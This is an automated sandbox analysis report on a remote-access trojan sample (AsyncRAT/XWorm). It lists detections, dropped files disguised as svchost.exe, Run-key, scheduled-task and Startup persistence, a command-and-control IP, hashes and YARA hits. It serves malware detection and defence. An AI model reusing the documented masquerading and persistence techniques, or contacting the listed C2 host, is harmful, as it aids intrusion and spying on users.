Email Addresses	DNS Server	Domain Accounts	1 PowerShell	21 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	2 Obfuscated Files or Information	Security Account Manager	24 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Registry Run Keys / Startup Folder	2 Software Packing	NTDS	571 Security Software Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	151 Virtualization/Sandbox Evasion	SSH	Keylogging	12 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Masquerading	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	151 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	111 Process Injection	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
Fulloption_V2.1.exe	63%	ReversingLabs	ByteCode-MSIL.Spyware.AsyncRAT
Fulloption_V2.1.exe	100%	Avira	TR/Dropper.Gen
Fulloption_V2.1.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\ProgramData\svchost.exe	100%	Avira	TR/Spy.Gen
C:\Users\user\AppData\Roaming\svchost.exe	100%	Avira	TR/Spy.Gen
C:\ProgramData\svchost.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\svchost.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe	100%	Joe Sandbox ML
C:\ProgramData\svchost.exe	84%	ReversingLabs	ByteCode-MSIL.Ransomware.CryptConsole
C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe	68%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Roaming\svchost.exe	84%	ReversingLabs	ByteCode-MSIL.Ransomware.CryptConsole

Source	Detection	Scanner	Label	Link
45.141.27.248	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ip-api.com	208.95.112.1	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
45.141.27.248	true	Avira URL Cloud: safe	unknown
http://ip-api.com/line/?fields=hosting	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://scripts.sil.org/OFLThis	FullOption_2.1Xenos.exe.0.dr	false	high
http://nuget.org/NuGet.exe	powershell.exe, 00000004.00000002.2249638917.0000022B1006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2347596021.000001F839F6D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2504001471.00000172F4F4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2693458155.000001649006C000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0	FullOption_2.1Xenos.exe.0.dr	false	high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000F.00000002.2565717676.0000016480228000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000004.00000002.2229972474.0000022B00229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2286205990.000001F82A129000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2401801389.00000172E5109000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2565717676.0000016480228000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000F.00000002.2565717676.0000016480228000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.micom/pkiops/Docs/ry.htm0	powershell.exe, 00000004.00000002.2258983299.0000022B6E970000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2361653227.000001F842573000.00000004.00000020.00020000.00000000.sdmp	false	high
http://www.microsoft.co	powershell.exe, 0000000F.00000002.2735931313.00000164F0B2D000.00000004.00000020.00020000.00000000.sdmp	false	high
https://contoso.com/License	powershell.exe, 0000000F.00000002.2693458155.000001649006C000.00000004.00000800.00020000.00000000.sdmp	false	high
http://crl.mic	powershell.exe, 0000000C.00000002.2525536547.00000172FD688000.00000004.00000020.00020000.00000000.sdmp	false	high
https://contoso.com/Icon	powershell.exe, 0000000F.00000002.2693458155.000001649006C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://scripts.sil.org/OFLhttps://indiantypefoundry.comNinad	FullOption_2.1Xenos.exe.0.dr	false	high
https://github.com/Pester/Pester	powershell.exe, 0000000F.00000002.2565717676.0000016480228000.00000004.00000800.00020000.00000000.sdmp	false	high
https://curl.haxx.se/docs/http-cookies.html	FullOption_2.1Xenos.exe, 00000002.00000000.2149053166.00007FF6AE833000.00000002.00000001.01000000.00000006.sdmp, FullOption_2.1Xenos.exe, 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmp, FullOption_2.1Xenos.exe.0.dr	false	high
http://crl.m	powershell.exe, 00000007.00000002.2363039514.000001F842646000.00000004.00000020.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000004.00000002.2229972474.0000022B00229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2286205990.000001F82A129000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2401801389.00000172E5109000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2565717676.0000016480228000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/	powershell.exe, 0000000F.00000002.2693458155.000001649006C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://nuget.org/nuget.exe	powershell.exe, 00000004.00000002.2249638917.0000022B1006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2347596021.000001F839F6D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2504001471.00000172F4F4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2693458155.000001649006C000.00000004.00000800.00020000.00000000.sdmp	false	high
http://ip-api.com	svchost.exe, 00000003.00000002.3395976559.000000000334D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3395976559.0000000003362000.00000004.00000800.00020000.00000000.sdmp	false	high
http://go.microsoft.c	powershell.exe, 0000000F.00000002.2715651701.00000164EE6AE000.00000004.00000020.00020000.00000000.sdmp	false	high
http://go.microsoft.ctain	powershell.exe, 0000000F.00000002.2715651701.00000164EE6AE000.00000004.00000020.00020000.00000000.sdmp	false	high
https://aka.ms/pscore68	powershell.exe, 00000004.00000002.2229972474.0000022B00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2286205990.000001F829F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2401801389.00000172E4EE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2565717676.0000016480001000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	svchost.exe, 00000003.00000002.3395976559.000000000334D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3395976559.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2229972474.0000022B00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2286205990.000001F829F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2401801389.00000172E4EE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2565717676.0000016480001000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/itfoundry/Poppins)&&&&s	FullOption_2.1Xenos.exe.0.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States		53334	TUT-ASUS	false
45.141.27.248	unknown	Netherlands		62068	SPECTRAIPSpectraIPBVNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1559237
Start date and time:	2024-11-20 10:36:13 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Fulloption_V2.1.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@22/24@1/2
EGA Information:	Successful, ratio: 12.5%
HCA Information:	Successful, ratio: 100% Number of executed functions: 78 Number of non-executed functions: 141
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target FullOption_2.1Xenos.exe, PID 416 because there are no executed function
Execution Graph export aborted for target Fulloption_V2.1.exe, PID 2012 because it is empty
Execution Graph export aborted for target powershell.exe, PID 1060 because it is empty
Execution Graph export aborted for target powershell.exe, PID 4816 because it is empty
Execution Graph export aborted for target powershell.exe, PID 4824 because it is empty
Execution Graph export aborted for target svchost.exe, PID 5648 because it is empty
Execution Graph export aborted for target svchost.exe, PID 5712 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: Fulloption_V2.1.exe

Simulations

Behavior and APIs

Time	Type	Description
04:37:12	API Interceptor	54x Sleep call for process: powershell.exe modified
04:38:12	API Interceptor	189x Sleep call for process: svchost.exe modified
10:38:08	Task Scheduler	Run new task: svchost path: C:\ProgramData\svchost.exe
10:38:08	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\ProgramData\svchost.exe
10:38:29	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\ProgramData\svchost.exe
10:38:49	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	BoostFPS.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	New_Order_Inquiry.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	seethebestthingswithgreatsituationshandletotheprogress.hta	Get hash	malicious	Cobalt Strike, AgentTesla, HTMLPhisher	Browse	ip-api.com/line/?fields=hosting
	DHL_Doc.9787653446578978656879764534576879764545766456.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx	Get hash	malicious	AgentTesla, HTMLPhisher	Browse	ip-api.com/line/?fields=hosting
	file.exe	Get hash	malicious	Unknown	Browse	ip-api.com/line/
	file.exe	Get hash	malicious	Unknown	Browse	ip-api.com/line/
	FACTER9098767800.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	[Purchase Order] PO2411024.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	Wire slip account payable.pif.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
45.141.27.248	BoostFPS.exe	Get hash	malicious	XWorm	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ip-api.com	BoostFPS.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	New_Order_Inquiry.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	seethebestthingswithgreatsituationshandletotheprogress.hta	Get hash	malicious	Cobalt Strike, AgentTesla, HTMLPhisher	Browse	208.95.112.1
	DHL_Doc.9787653446578978656879764534576879764545766456.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx	Get hash	malicious	AgentTesla, HTMLPhisher	Browse	208.95.112.1
	file.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	file.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	paket teklif.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	FACTER9098767800.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	[Purchase Order] PO2411024.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SPECTRAIPSpectraIPBVNL	BoostFPS.exe	Get hash	malicious	XWorm	Browse	45.141.27.248
	bPRQRIfbbq.exe	Get hash	malicious	Unknown	Browse	45.138.16.44
	4Fm0sK0yKz.exe	Get hash	malicious	AsyncRAT	Browse	45.141.215.18
	Payload 94.75 (3).225.exe	Get hash	malicious	Unknown	Browse	45.141.215.40
	Payload 94.75 (2).225.exe	Get hash	malicious	Unknown	Browse	45.141.215.116
	Payload 94.75 (3).225.exe	Get hash	malicious	Unknown	Browse	45.138.16.76
	Payload 94.75 (2).225.exe	Get hash	malicious	Unknown	Browse	45.141.215.21
	Payload 94.75.225.exe	Get hash	malicious	Unknown	Browse	45.141.215.61
	https://alcatrazpackages.com/elchapo.html	Get hash	malicious	Unknown	Browse	45.87.42.74
	la.bot.mipsel.elf	Get hash	malicious	Unknown	Browse	45.141.201.6
TUT-ASUS	BoostFPS.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	New_Order_Inquiry.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	seethebestthingswithgreatsituationshandletotheprogress.hta	Get hash	malicious	Cobalt Strike, AgentTesla, HTMLPhisher	Browse	208.95.112.1
	DHL_Doc.9787653446578978656879764534576879764545766456.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx	Get hash	malicious	AgentTesla, HTMLPhisher	Browse	208.95.112.1
	file.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	file.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	http://ok.clicknowvip.com	Get hash	malicious	Unknown	Browse	162.252.214.5
	paket teklif.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	FACTER9098767800.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe	4QnTBz8fN3.exe	Get hash	malicious	AsyncRAT, XWorm	Browse

Created / dropped Files

C:\ProgramData\svchost.exe

Process:	C:\Users\user\AppData\Roaming\svchost.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	75264
Entropy (8bit):	5.976607627301734
Encrypted:	false
SSDEEP:	1536:jSJd0NZZ4CuyMAa70b36MJP6ROuEn9i8:+J3C1ba70b3xYOuEn48
MD5:	12B722899C9A6B517D52B8DE2C7C3E2E
SHA1:	A92DBC8EDD02ADEEAB5FA9C0E2A884A84A315FE5
SHA-256:	57EC7BCA087DD678BEF5AEAAA52F4F393D63613976701E6A111015FB7F9F1B6C
SHA-512:	F7B56B96A2DCDA223668D82BC8DD7C5A0E7E5786AACAD6A0BEC809E8525E383B9A85F9E834CF29636FCDB84CCE97CF4AD996F9D2CC827C189A2C06BAEC661A53
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\svchost.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\svchost.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\svchost.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 84%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....(g.............................;... ...@....@.. ....................................@.................................p;..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......$..............@..B.................;......H........c..X.......&.....................................................(.....r...p. ......(.....rA..p. S....s.........s.........s.........s..........r...p. .....r...p. ..e..r...p. E/...rA..p. .q...r...p. ......((....r...p.r...p. p{..(+...-.(,...,.+.(-...,.+.(...,.+.()...,..(Z..."(....+.&(....&+..+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-..r...p. ....r_..p. ^....r...p. .....r...p.r...p.r_..p. z....r...p.r...p. O....r..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Fulloption_V2.1.exe.log

Process:	C:\Users\user\Desktop\Fulloption_V2.1.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	654
Entropy (8bit):	5.380476433908377
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
MD5:	30E4BDFC34907D0E4D11152CAEBE27FA
SHA1:	825402D6B151041BA01C5117387228EC9B7168BF
SHA-256:	A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
SHA-512:	89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log

Process:	C:\ProgramData\svchost.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	654
Entropy (8bit):	5.380476433908377
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
MD5:	30E4BDFC34907D0E4D11152CAEBE27FA
SHA1:	825402D6B151041BA01C5117387228EC9B7168BF
SHA-256:	A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
SHA-512:	89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\Log.tmp

Process:	C:\Users\user\AppData\Roaming\svchost.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	94
Entropy (8bit):	4.526849223511721
Encrypted:	false
SSDEEP:	3:rRSFzVowiaGIF2cWRA4kvRovNsr4ryyAFYJKXzovNsra:EF5BxGIF2RUZoWrcyyAFYJKDoWra
MD5:	9C280D191DBCF46E65ECE3D7061D8CC8
SHA1:	9D5B381E516455F717678992E6D431FFDE136A2C
SHA-256:	E0099B6480A085315677DD3ED14B81CA0F794EAA3063878942AAFA366A865478
SHA-512:	90378A0DFC76C8B0DAE30580F5D2ACA852BB68388CBE4B292B3CF10C056A521D8960D071CC99C701203AAA873ECFE7A861101F905D10E1D7754DC03B49B86FCE
Malicious:	false
Preview:	....### FullOption_2.1Xenos.exe - System Error ###..[WIN]r[WIN]r....### explorer ###..[WIN]r

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0b5tsa0x.avl.psm1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0soqawef.b1t.psm1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0urdr2wd.rza.psm1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2cidhn5k.gc4.psm1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2hmxwhrd.llm.ps1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ar1pyaf.c1l.psm1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bhpygqr4.zno.ps1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cchnrycx.wfb.psm1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
